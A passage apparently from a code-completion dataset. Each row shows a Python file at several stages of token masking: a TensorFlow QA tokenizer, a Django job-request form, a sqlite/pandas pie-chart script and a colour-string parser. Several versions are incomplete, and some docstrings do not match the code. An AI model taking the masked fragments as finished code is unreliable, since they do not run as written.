print(' tokenizing line %d' % counter)
token_ids = sentence_to_token_ids(tf.compat.as_bytes(
line), vocab)
tokens_file.write(' '.join([str(tok) for tok in
token_ids]) + '\n')
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file
):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
A tuple of 6 elements:
(1) path to the token-ids for src training data-set,
(2) path to the token-ids for target training data-set,
(3) path to the token-ids for src development data-set,
(4) path to the token-ids for src development data-set,
(5) path to the src vocabulary file,
(6) path to the src vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
vocab_path = os.path.join(data_dir, 'vocab.txt')
create_vocabulary(vocab_path, vocab_file)
src_train_ids_path = train_path + '.src.ids'
targ_train_ids_path = train_path + '.targ.ids'
data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)
data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)
src_dev_ids_path = dev_path + '.src.ids'
targ_dev_ids_path = dev_path + '.targ.ids'
data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,
targ_dev_ids_path, vocab_path)
| <mask token>
_PAD = b'_PAD'
_GO = b'_GO'
_EOS = b'_EOS'
_UNK = b'_UNK'
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3
_WORD_SPLIT = re.compile(b'([.,!?"\':;)(])')
_DIGIT_RE = re.compile(b'\\d')
def get_qa_set(directory, jsonl_file):
"""Download the WMT en-fr training corpus to directory unless it's there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(
targ_path, 'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(_WORD_SPLIT.split(space_separated_fragment))
return [w for w in words if w]
def create_vocabulary(vocabulary_path, json_vocab_path):
"""Create vocabulary file (if it does not exist yet) from data file.
Data file is assumed to contain one sentence per line. Each sentence is
tokenized and digits are normalized (if normalize_digits is set).
Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
We write it to vocabulary_path in a one-token-per-line format, so that later
token in the first line gets id=0, second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
json_vocab_path: data file that will be used to create vocabulary.
"""
if not gfile.Exists(vocabulary_path):
print('Transform vocabulary to %s' % vocabulary_path)
with gfile.GFile(json_vocab_path, mode='rb') as f:
jvocab = json.load(f)
vocab = jvocab['w2id']
vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)
with gfile.GFile(vocabulary_path, mode='wb') as vocab_file:
for w in vocab_list:
vocab_file.write(w + b'\n')
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode='rb') as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip() for line in rev_vocab]
vocab = dict([(x, y) for y, x in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError('Vocabulary file %s not found.', vocabulary_path)
def sentence_to_token_ids(sentence, vocabulary):
"""Convert a string to list of integers representing token-ids.
For example, a sentence "I have a dog" may become tokenized into
["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
"a": 4, "dog": 7"} this function will return [1, 2, 4, 7].
Args:
sentence: the sentence in bytes format to convert to token-ids.
vocabulary: a dictionary mapping tokens to integers.
Returns:
a list of integers, the token-ids for the sentence.
"""
return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]
def data_to_token_ids(data_path, target_path, vocabulary_path):
"""Tokenize data file and turn into token-ids using given vocabulary file.
This function loads data line-by-line from data_path, calls the above
sentence_to_token_ids, and saves the result to target_path. See comment
for sentence_to_token_ids on the details of token-ids format.
Args:
data_path: path to the data file in one-sentence-per-line format.
target_path: path where the file with token-ids will be created.
vocabulary_path: path to the vocabulary file.
"""
if not gfile.Exists(target_path):
print('Tokenizing data in %s' % data_path)
vocab, _ = initialize_vocabulary(vocabulary_path)
with gfile.GFile(data_path, mode='rb') as data_file:
with gfile.GFile(target_path, mode='w') as tokens_file:
counter = 0
for line in data_file:
counter += 1
if counter % 100000 == 0:
print(' tokenizing line %d' % counter)
token_ids = sentence_to_token_ids(tf.compat.as_bytes(
line), vocab)
tokens_file.write(' '.join([str(tok) for tok in
token_ids]) + '\n')
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file
):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
A tuple of 6 elements:
(1) path to the token-ids for src training data-set,
(2) path to the token-ids for target training data-set,
(3) path to the token-ids for src development data-set,
(4) path to the token-ids for src development data-set,
(5) path to the src vocabulary file,
(6) path to the src vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
vocab_path = os.path.join(data_dir, 'vocab.txt')
create_vocabulary(vocab_path, vocab_file)
src_train_ids_path = train_path + '.src.ids'
targ_train_ids_path = train_path + '.targ.ids'
data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)
data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)
src_dev_ids_path = dev_path + '.src.ids'
targ_dev_ids_path = dev_path + '.targ.ids'
data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,
targ_dev_ids_path, vocab_path)
| # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
import json
from tensorflow.python.platform import gfile
import tensorflow as tf
# Special vocabulary symbols - we always put them at the start.
_PAD = b"_PAD"
_GO = b"_GO"
_EOS = b"_EOS"
_UNK = b"_UNK"
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3
# Regular expressions used to tokenize.
_WORD_SPLIT = re.compile(b"([.,!?\"':;)(])")
_DIGIT_RE = re.compile(br"\d")
def get_qa_set(directory, jsonl_file):
"""Download the WMT en-fr training corpus to directory unless it's there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path,'w') as srcfile, open(targ_path,'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(_WORD_SPLIT.split(space_separated_fragment))
return [w for w in words if w]
def create_vocabulary(vocabulary_path, json_vocab_path):
"""Create vocabulary file (if it does not exist yet) from data file.
Data file is assumed to contain one sentence per line. Each sentence is
tokenized and digits are normalized (if normalize_digits is set).
Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
We write it to vocabulary_path in a one-token-per-line format, so that later
token in the first line gets id=0, second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
json_vocab_path: data file that will be used to create vocabulary.
"""
if not gfile.Exists(vocabulary_path):
print("Transform vocabulary to %s" % vocabulary_path)
with gfile.GFile(json_vocab_path, mode="rb") as f:
jvocab = json.load(f)
vocab = jvocab['w2id']
vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)
with gfile.GFile(vocabulary_path, mode="wb") as vocab_file:
for w in vocab_list:
vocab_file.write(w + b"\n")
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode="rb") as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip() for line in rev_vocab]
vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError("Vocabulary file %s not found.", vocabulary_path)
def sentence_to_token_ids(sentence, vocabulary):
"""Convert a string to list of integers representing token-ids.
For example, a sentence "I have a dog" may become tokenized into
["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
"a": 4, "dog": 7"} this function will return [1, 2, 4, 7].
Args:
sentence: the sentence in bytes format to convert to token-ids.
vocabulary: a dictionary mapping tokens to integers.
Returns:
a list of integers, the token-ids for the sentence.
"""
return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]
def data_to_token_ids(data_path, target_path, vocabulary_path):
"""Tokenize data file and turn into token-ids using given vocabulary file.
This function loads data line-by-line from data_path, calls the above
sentence_to_token_ids, and saves the result to target_path. See comment
for sentence_to_token_ids on the details of token-ids format.
Args:
data_path: path to the data file in one-sentence-per-line format.
target_path: path where the file with token-ids will be created.
vocabulary_path: path to the vocabulary file.
"""
if not gfile.Exists(target_path):
print("Tokenizing data in %s" % data_path)
vocab, _ = initialize_vocabulary(vocabulary_path)
with gfile.GFile(data_path, mode="rb") as data_file:
with gfile.GFile(target_path, mode="w") as tokens_file:
counter = 0
for line in data_file:
counter += 1
if counter % 100000 == 0:
print(" tokenizing line %d" % counter)
token_ids = sentence_to_token_ids(tf.compat.as_bytes(line), vocab)
tokens_file.write(" ".join([str(tok) for tok in token_ids]) + "\n")
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
A tuple of 6 elements:
(1) path to the token-ids for src training data-set,
(2) path to the token-ids for target training data-set,
(3) path to the token-ids for src development data-set,
(4) path to the token-ids for src development data-set,
(5) path to the src vocabulary file,
(6) path to the src vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
# Get wmt data to the specified directory.
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
# Create vocabularies of the appropriate sizes.
vocab_path = os.path.join(data_dir, "vocab.txt")
create_vocabulary(vocab_path, vocab_file)
# Create token ids for the training data.
src_train_ids_path = train_path + ".src.ids"
targ_train_ids_path = train_path + ".targ.ids"
data_to_token_ids(train_path + ".src", src_train_ids_path, vocab_path)
data_to_token_ids(train_path + ".targ", targ_train_ids_path, vocab_path)
# Create token ids for the development data.
src_dev_ids_path = dev_path + ".src.ids"
targ_dev_ids_path = dev_path + ".targ.ids"
data_to_token_ids(dev_path + ".src", src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + ".targ", targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path,
src_dev_ids_path, targ_dev_ids_path,
vocab_path)
 | [2, 3, 7, 8, 10] |
695 | 3887516e4222504defe439e62bd24b12db3cdd84 | <mask token>
| <mask token>
class WorkRequestForm(forms.ModelForm):
<mask token>
class Meta:
model = HhRequest
fields = 'profile', 'sphere', 'experience', 'work_request', 'resume'
widgets = {'profile': forms.Select(attrs={'id': 'profile',
'required': '', 'class': 'browser-default custom-select'}),
'sphere': forms.Select(attrs={'id': 'sphere', 'required': '',
'class': 'browser-default custom-select'}), 'experience': forms
.Select(attrs={'id': 'experience', 'required': '', 'class':
'browser-default custom-select'}), 'work_request': forms.Select
(attrs={'id': 'work_request', 'required': '', 'class':
'browser-default custom-select'}), 'resume': forms.FileInput(
attrs={'id': 'hh_resume', 'required': '', 'class':
'custom-file-input', 'lang': 'ru'})}
| <mask token>
class WorkRequestForm(forms.ModelForm):
"""Форма заявки на премию"""
class Meta:
model = HhRequest
fields = 'profile', 'sphere', 'experience', 'work_request', 'resume'
widgets = {'profile': forms.Select(attrs={'id': 'profile',
'required': '', 'class': 'browser-default custom-select'}),
'sphere': forms.Select(attrs={'id': 'sphere', 'required': '',
'class': 'browser-default custom-select'}), 'experience': forms
.Select(attrs={'id': 'experience', 'required': '', 'class':
'browser-default custom-select'}), 'work_request': forms.Select
(attrs={'id': 'work_request', 'required': '', 'class':
'browser-default custom-select'}), 'resume': forms.FileInput(
attrs={'id': 'hh_resume', 'required': '', 'class':
'custom-file-input', 'lang': 'ru'})}
| from django import forms
from .models import HhRequest
class WorkRequestForm(forms.ModelForm):
"""Форма заявки на премию"""
class Meta:
model = HhRequest
fields = 'profile', 'sphere', 'experience', 'work_request', 'resume'
widgets = {'profile': forms.Select(attrs={'id': 'profile',
'required': '', 'class': 'browser-default custom-select'}),
'sphere': forms.Select(attrs={'id': 'sphere', 'required': '',
'class': 'browser-default custom-select'}), 'experience': forms
.Select(attrs={'id': 'experience', 'required': '', 'class':
'browser-default custom-select'}), 'work_request': forms.Select
(attrs={'id': 'work_request', 'required': '', 'class':
'browser-default custom-select'}), 'resume': forms.FileInput(
attrs={'id': 'hh_resume', 'required': '', 'class':
'custom-file-input', 'lang': 'ru'})}
| from django import forms
from .models import HhRequest
class WorkRequestForm(forms.ModelForm):
"""Форма заявки на премию"""
class Meta:
model = HhRequest
fields = ('profile', 'sphere', 'experience', 'work_request', 'resume')
widgets = {
'profile': forms.Select(
attrs={
'id': 'profile',
'required': '',
'class': 'browser-default custom-select'
}
),
'sphere': forms.Select(
attrs={
'id': 'sphere',
'required': '',
'class': 'browser-default custom-select'
}
),
'experience': forms.Select(
attrs={
'id': 'experience',
'required': '',
'class': 'browser-default custom-select'
}
),
'work_request': forms.Select(
attrs={
'id': 'work_request',
'required': '',
'class': 'browser-default custom-select'
}
),
'resume': forms.FileInput(
attrs={
'id': 'hh_resume',
'required': '',
'class': 'custom-file-input',
'lang': 'ru'
}
),
}
 | [0, 1, 2, 3, 4] |
696 | c19c3f580d7555379bd7e077b0264a3784179e93 | <mask token>
| <mask token>
c.execute(
"SELECT a.Name, count(c.visitorID) FROM attraction as a, checkin c WHERE a.AttractionID = c.attraction AND a.Category like 'Thrill Rides%' GROUP BY a.AttractionID "
)
<mask token>
print(thrillRidesVisitsResult)
<mask token>
c.close()
plt.pie(thrillRidesVisitsDataFrame['visits_count'], labels=
thrillRidesVisitsDataFrame['ride_name'], autopct='%1.1f%%', shadow=False)
plt.axis('equal')
plt.show()
| <mask token>
db_filename = 'readonly/dinofunworld.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
c.execute(
"SELECT a.Name, count(c.visitorID) FROM attraction as a, checkin c WHERE a.AttractionID = c.attraction AND a.Category like 'Thrill Rides%' GROUP BY a.AttractionID "
)
thrillRidesVisitsResult = c.fetchall()
print(thrillRidesVisitsResult)
thrillRidesVisitsDataFrame = pd.DataFrame.from_records(thrillRidesVisitsResult,
columns=['ride_name', 'visits_count'])
c.close()
plt.pie(thrillRidesVisitsDataFrame['visits_count'], labels=
thrillRidesVisitsDataFrame['ride_name'], autopct='%1.1f%%', shadow=False)
plt.axis('equal')
plt.show()
| import sqlite3
import pandas as pd
import matplotlib.pyplot as plt
db_filename = 'readonly/dinofunworld.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
c.execute(
"SELECT a.Name, count(c.visitorID) FROM attraction as a, checkin c WHERE a.AttractionID = c.attraction AND a.Category like 'Thrill Rides%' GROUP BY a.AttractionID "
)
thrillRidesVisitsResult = c.fetchall()
print(thrillRidesVisitsResult)
thrillRidesVisitsDataFrame = pd.DataFrame.from_records(thrillRidesVisitsResult,
columns=['ride_name', 'visits_count'])
c.close()
plt.pie(thrillRidesVisitsDataFrame['visits_count'], labels=
thrillRidesVisitsDataFrame['ride_name'], autopct='%1.1f%%', shadow=False)
plt.axis('equal')
plt.show()
| import sqlite3
import pandas as pd
#%matplotlib inline
import matplotlib.pyplot as plt
db_filename = 'readonly/dinofunworld.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
c.execute("SELECT a.Name, count(c.visitorID) \
FROM attraction as a, checkin c \
WHERE \
a.AttractionID = c.attraction \
AND a.Category like 'Thrill Rides%' \
GROUP BY a.AttractionID \
")
thrillRidesVisitsResult = c.fetchall()
print(thrillRidesVisitsResult)
thrillRidesVisitsDataFrame = pd.DataFrame.from_records(thrillRidesVisitsResult, columns=['ride_name', 'visits_count'])
c.close()
plt.pie(thrillRidesVisitsDataFrame['visits_count'], labels=thrillRidesVisitsDataFrame['ride_name'], autopct='%1.1f%%', shadow=False)
plt.axis('equal')
plt.show() | [0, 1, 2, 3, 4] |
697 | 978f3979aee1c4361483fd61b54352e7fff8d3b3 | <mask token>
def parse_hex3(hex3):
"""Example: #a3d"""
if (m := re.match('^#?([0-9A-Fa-f]{3})$', hex3.strip())):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f'String {hex3!r} does not match hex3 format.')
<mask token>
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if (m := re.match(
'^rgb\\(\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_float format.'
)
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(
f'String {rgbfunc!r} does not match rgbfunc_percent format.')
<mask token>
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f'Color {name!r} is not named in the crayola dataset.'
)
return parse_hex6(_crayola_names[name])
<mask token>
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(
f'Color {name!r} is not named in the meodai-best dataset.')
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f'Color {name!r} is not named in the meodai dataset.')
return parse_hex6(_meodai_names[name])
def parse(colstr, *, hex6=True, hex3=True, rgbfunc_int=True, rgbfunc_float=
True, rgbfunc_percent=True, name_css=True, name_crayola=True, name_xkcd
=True, name_meodai_best=True, name_meodai=True):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f'Could not find a working parser for {colstr!r}.')
return res
| <mask token>
def parse_hex6(hex6):
"""Example: #ab34df"""
if (m := re.match('^#?([0-9A-Fa-f]{6})$', hex6.strip())):
h = int(m.group(1), 16)
return hex_to_rgb(h)
raise ValueError(f'String {hex6!r} does not match hex6 format.')
def parse_hex3(hex3):
"""Example: #a3d"""
if (m := re.match('^#?([0-9A-Fa-f]{3})$', hex3.strip())):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f'String {hex3!r} does not match hex3 format.')
def parse_rgbfunc_int(rgbfunc):
"""Example: rgb(171, 52, 223)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*\\)$',
rgbfunc.strip())):
t = tuple(map(int, m.groups()))
if not any(n > 255 for n in t):
return t
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_int format.')
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if (m := re.match(
'^rgb\\(\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_float format.'
)
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(
f'String {rgbfunc!r} does not match rgbfunc_percent format.')
def parse_name_css(name):
name = name.lower()
if name not in _css_names:
raise ValueError(f'Color {name!r} is not named in the CSS dataset.')
return parse_hex6(_css_names[name])
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f'Color {name!r} is not named in the crayola dataset.'
)
return parse_hex6(_crayola_names[name])
<mask token>
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(
f'Color {name!r} is not named in the meodai-best dataset.')
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f'Color {name!r} is not named in the meodai dataset.')
return parse_hex6(_meodai_names[name])
def parse(colstr, *, hex6=True, hex3=True, rgbfunc_int=True, rgbfunc_float=
True, rgbfunc_percent=True, name_css=True, name_crayola=True, name_xkcd
=True, name_meodai_best=True, name_meodai=True):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f'Could not find a working parser for {colstr!r}.')
return res
| <mask token>
__all__ = ['parse_hex6', 'parse_hex3', 'parse_rgbfunc_int',
'parse_rgbfunc_float', 'parse_rgbfunc_percent', 'parse_name_css',
'parse_name_crayola', 'parse_name_xkcd', 'parse_name_meodai_best',
'parse_name_meodai', 'parse']
_css_names = json.loads(resources.read_text('pilutils.colornames', 'css.json'))
_crayola_names = json.loads(resources.read_text('pilutils.colornames',
'crayola.json'))
_xkcd_names = json.loads(resources.read_text('pilutils.colornames',
'xkcd.json'))
_meodai_best_names = json.loads(resources.read_text('pilutils.colornames',
'meodai-best.json'))
_meodai_names = json.loads(resources.read_text('pilutils.colornames',
'meodai.json'))
def parse_hex6(hex6):
"""Example: #ab34df"""
if (m := re.match('^#?([0-9A-Fa-f]{6})$', hex6.strip())):
h = int(m.group(1), 16)
return hex_to_rgb(h)
raise ValueError(f'String {hex6!r} does not match hex6 format.')
def parse_hex3(hex3):
"""Example: #a3d"""
if (m := re.match('^#?([0-9A-Fa-f]{3})$', hex3.strip())):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f'String {hex3!r} does not match hex3 format.')
def parse_rgbfunc_int(rgbfunc):
"""Example: rgb(171, 52, 223)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*\\)$',
rgbfunc.strip())):
t = tuple(map(int, m.groups()))
if not any(n > 255 for n in t):
return t
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_int format.')
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if (m := re.match(
'^rgb\\(\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_float format.'
)
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(
f'String {rgbfunc!r} does not match rgbfunc_percent format.')
def parse_name_css(name):
name = name.lower()
if name not in _css_names:
raise ValueError(f'Color {name!r} is not named in the CSS dataset.')
return parse_hex6(_css_names[name])
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f'Color {name!r} is not named in the crayola dataset.'
)
return parse_hex6(_crayola_names[name])
def parse_name_xkcd(name):
name = name.lower()
if name not in _xkcd_names:
raise ValueError(f'Color {name!r} is not named in the xkcd dataset.')
return parse_hex6(_xkcd_names[name])
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(
f'Color {name!r} is not named in the meodai-best dataset.')
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f'Color {name!r} is not named in the meodai dataset.')
return parse_hex6(_meodai_names[name])
def parse(colstr, *, hex6=True, hex3=True, rgbfunc_int=True, rgbfunc_float=
True, rgbfunc_percent=True, name_css=True, name_crayola=True, name_xkcd
=True, name_meodai_best=True, name_meodai=True):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f'Could not find a working parser for {colstr!r}.')
return res
| <mask token>
import json
import re
from pathlib import Path
import importlib.resources as resources
from pilutils.basic import hex_to_rgb
__all__ = ['parse_hex6', 'parse_hex3', 'parse_rgbfunc_int',
'parse_rgbfunc_float', 'parse_rgbfunc_percent', 'parse_name_css',
'parse_name_crayola', 'parse_name_xkcd', 'parse_name_meodai_best',
'parse_name_meodai', 'parse']
_css_names = json.loads(resources.read_text('pilutils.colornames', 'css.json'))
_crayola_names = json.loads(resources.read_text('pilutils.colornames',
'crayola.json'))
_xkcd_names = json.loads(resources.read_text('pilutils.colornames',
'xkcd.json'))
